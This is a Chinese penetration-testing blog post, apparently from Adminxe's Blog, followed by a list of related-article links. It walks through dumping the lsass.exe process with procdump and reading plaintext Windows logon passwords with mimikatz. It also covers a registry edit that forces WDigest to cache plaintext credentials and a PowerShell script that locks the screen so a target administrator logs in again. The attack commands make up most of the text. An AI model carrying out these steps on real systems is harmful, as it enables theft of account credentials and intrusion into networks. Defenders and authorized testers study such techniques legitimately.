0x00 原理

获取到内存文件 lsass.exe 进程 (它用于本地安全和登陆策略) 中存储的明文登录密码。

0x01 操作

Windows10/2012 以下的版本:
1、上传 procdump 执行命令转存出 lsass.dmp 文件(需要管理员权限)

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

2、拿到 mimikatz 文件夹执行命令读明文:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
直接输出到文本
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >pass.txt
mimikatz直接读取密码:mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"  "exit"> password.txt

或者手工转存 lsass.dmp 文件,打开任务管理器,选中进程,并且在其中找到 lsass.exe 这一项。

2. 找到这一项之后,单击右键,选择创建转储文件。

3. 点击之后,电脑会将该文件转储到文件夹里面,我们需要记住这个路径,并且将这个文件复制到 mimikatz 的文件夹里面。

2、拿到 mimikatz 文件夹执行命令读明文:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
直接输出到文本
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" >pass.txt

Windows10/2012R2 版本:
默认 Windows10 或者 2012R2 以上的,禁止在内存缓存中保存明文密码。

四步骤:
1、修改注册表
2、锁屏或者退出账号
3、等待目标系统管理员重新登录
4、读取密码

修改注册表来让 Wdigest Auth 保存明文口令:
复原把 1 改为 0

reg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

修改注册表需要重启,或者注销账号重新登录。

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

然后拿到 mimikatz 文件夹执行命令读明文:

sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full

看别人的文章说能写一个强制锁屏的 powershell 脚本文件,通过锁屏让目标重新启动电脑。

Windows2012 版本强制锁屏脚本,
保存为 lock-screen.ps1:
记得查看管理员是否在线。

Function Lock-WorkStation { $signature = @" [DllImport("user32.dll", SetLastError = true)] public static extern bool LockWorkStation(); "@ $LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru $LockWorkStation::LockWorkStation() | Out-Null}Lock-WorkStation

脚本使用方法:

powershell -file lock-screen.ps1

转载请注明:Adminxe's Blog » mimikatz+procdump 提取 Windows 明文密码

内网渗透之mimikatz+procdump 提取 Windows 明文密码相关推荐

  1. 内网渗透(二十四)之Windows协议认证和密码抓取-Mimikatz读取sam和lsass获取密码

    系列文章第一章节之基础知识篇 内网渗透(一)之基础知识-内网渗透介绍和概述 内网渗透(二)之基础知识-工作组介绍 内网渗透(三)之基础知识-域环境的介绍和优点 内网渗透(四)之基础知识-搭建域环境 内 ...

  2. 管理端口_内网渗透 | 红蓝对抗:Windows利用WinRM实现端口复用打造隐蔽后门

    目录 WinRM端口复用原理 端口复用配置 新增80端口监听 修改WinRM默认监听的端口 远程连接WinRM WinRM端口复用原理 该端口复用的原理是使用Windows的远程管理服务WinRM,结 ...

  3. 内网渗透系列:内网信息搜集方法小结2

    目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...

  4. Windows 内网渗透之攻击域控

    文章目录 内网渗透之攻击域控 前言 高权限读取本地密码 procdump+mimikatz绕过杀软 SYSVOL组策略获取密码 Kerberoasting 暴力破解密码 原理 使用setspn查询sp ...

  5. 红蓝对抗之Windows内网渗透

    无论是渗透测试,还是红蓝对抗,目的都是暴露风险,促进提升安全水平.企业往往在外网布置重兵把守,而内网防护相对来说千疮百孔,所以渗透高手往往通过攻击员工电脑.外网服务.职场WiFi等方式进入内网,然后发 ...

  6. 内网渗透-Windows内网渗透

    内网渗透-Windows内网渗透 文章目录 内网渗透-Windows内网渗透 前言 一.信息收集 1.1.SPN 1.2.端口连接 1.3.配置文件 1.4.用户信息 1.6.会话收集 1.7.凭据收 ...

  7. 内网渗透(windows)

    内网渗透 文章目录 内网渗透 基础知识 信息收集 常用命令 系统默认常见用户身份: 横向渗透(重点) 获取明文密码或Hash密码(需要管理员权限) PwDump7工具 Mimikatz工具 Procd ...

  8. 内网渗透,横向移动总结(mimikatz域控)

    目录 前言 利用windows远程连接命令 ipc连接 at命令 schtasks命令 (在2008及以后的系统中已经将at命令废弃,改用schtasks命令代替了at命令) 利用windows服务 ...

  9. windows内网渗透PTH/PTK攻击

    前言 windows内网渗透中,有三种最常用的pass系列攻击: pass the hash(hash传递攻击,简称pth) pass the ticket(票据传递攻击,简称ptt) pass th ...

最新文章

  1. robot framework中的timeout的关键词
  2. 《OpenCV3编程入门》 札记
  3. linux 修改文件时间
  4. 运维进化论:微盟“删库跑路”给我们的启示
  5. C# MD5,hmacSHA1
  6. Flutter进阶—实现动画效果(十)
  7. 微软智能云Azure Kubernetes容器服务落地中国,开启预览
  8. android 白平衡,保存Android相机焦点和白平衡状态
  9. [禅悟人生]不自律的品性如堕落的瓷瓶
  10. 数据挖掘导论阅读笔记第一章:绪论
  11. Unity3d十二 3d主要引擎名称Ogre Unreal Unity Gamebryo Bigworld
  12. STM32F207时钟系统解析
  13. Java 逐行读写 TXT 文件
  14. Excel表格数据导入到Oracle
  15. 顶级业务架构设计的“道”与“术”,醍醐灌顶!
  16. 华为核心交换机HW_S7706添加静态路由
  17. EditPlus 说明
  18. 查询局域网内在线电脑IP地址
  19. 计算机菜单在桌面未显示怎么找回,电脑桌面开始菜单不见和任务栏消失怎么办...
  20. 端口隔离是什么?为什么需要端口隔离、如何实现端口隔离?一文解惑

热门文章

  1. 自动化专业本科学习笔记
  2. 活着就是为了改变世界
  3. 中产与“伪中产”的对决:正面刚星巴克,Luckin果真很 Luck
  4. 5V电压ESD保护二极管,常用型号汇总
  5. Robomongo连接远程MongoDB数据库
  6. Emgu CV3+C#图像处理(一):Emgu CV学习目录+EmguCV安装配置与使用
  7. Verilog 语言 ——计数器
  8. 塔望3W消费战略全案|唯氏:婴幼儿辅食品牌全案策划
  9. 从零学习 InfiniBand-network架构(九) —— IB协议中子网本地地址
  10. Microsoft Edge浏览器安装Chrome浏览器主题